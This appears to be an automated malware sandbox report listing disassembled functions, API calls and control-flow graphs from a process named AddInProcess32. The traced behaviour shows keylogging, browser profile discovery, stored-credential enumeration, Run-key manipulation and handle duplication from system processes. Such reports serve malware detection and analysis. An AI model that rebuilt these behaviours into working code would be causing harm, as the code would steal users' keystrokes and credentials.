                                                      • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                      APIs
                                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                      • API String ID: 1174141254-4188645398
                                                      • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                      • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                      • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                      • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                      APIs
                                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                      • API String ID: 1174141254-2800177040
                                                      • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                      • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                      • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                      • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                      APIs
                                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: AppData$\Opera Software\Opera Stable\
                                                      • API String ID: 1174141254-1629609700
                                                      • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                      • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                      • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                      • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                      APIs
                                                      • GetKeyState.USER32(00000011), ref: 0040B686
                                                        • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                        • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                        • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                        • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                        • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                        • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                        • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                        • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                      • String ID: [AltL]$[AltR]
                                                      • API String ID: 2738857842-2658077756
                                                      • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                      • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                      • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                      • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$FileSystem
                                                      • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                      • API String ID: 2086374402-949981407
                                                      • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                      • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                      • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                      • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID: !D@$open
                                                      • API String ID: 587946157-1586967515
                                                      • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                      • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                      • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                      • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                      APIs
                                                      • ___initconout.LIBCMT ref: 004555DB
                                                        • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                                      • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleCreateFileWrite___initconout
                                                      • String ID: PkGNG
                                                      • API String ID: 3087715906-263838557
                                                      • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                      • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                                      • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                      • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                                      APIs
                                                      • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State
                                                      • String ID: [CtrlL]$[CtrlR]
                                                      • API String ID: 1649606143-2446555240
                                                      • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                      • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                      • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                      • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                      APIs
                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                      • __Init_thread_footer.LIBCMT ref: 00410F64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Init_thread_footer__onexit
                                                      • String ID: ,kG$0kG
                                                      • API String ID: 1881088180-2015055088
                                                      • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                      • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                      • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                      • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                                      • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteOpenValue
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                      • API String ID: 2654517830-1051519024
                                                      • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                      • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                      • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                      • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                      • GetLastError.KERNEL32 ref: 00440D85
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                      • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                      • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                      • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                      APIs
                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                      • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastRead
                                                      • String ID:
                                                      • API String ID: 4100373531-0
                                                      • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                      • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                      • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                      • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                      APIs
                                                      • memset.MSVCRT ref: 0040DDAD
                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                      • memset.MSVCRT ref: 0040DF5F
                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                      • API String ID: 708747863-3398334509
                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                      APIs
                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                      • free.MSVCRT ref: 00418803
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                      • String ID:
                                                      • API String ID: 1355100292-0
                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FileFind$FirstNext
                                                      • String ID:
                                                      • API String ID: 1690352074-0
                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                      APIs
                                                      • memset.MSVCRT ref: 0041898C
                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: InfoSystemmemset
                                                      • String ID:
                                                      • API String ID: 3558857096-0
                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                      APIs
                                                      • memset.MSVCRT ref: 004455C2
                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                      • memset.MSVCRT ref: 0044570D
                                                      • memset.MSVCRT ref: 00445725
                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                      • memset.MSVCRT ref: 0044573D
                                                      • memset.MSVCRT ref: 00445755
                                                      • memset.MSVCRT ref: 004458CB
                                                      • memset.MSVCRT ref: 004458E3
                                                      • memset.MSVCRT ref: 0044596E
                                                      • memset.MSVCRT ref: 00445A10
                                                      • memset.MSVCRT ref: 00445A28
                                                      • memset.MSVCRT ref: 00445AC6
                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
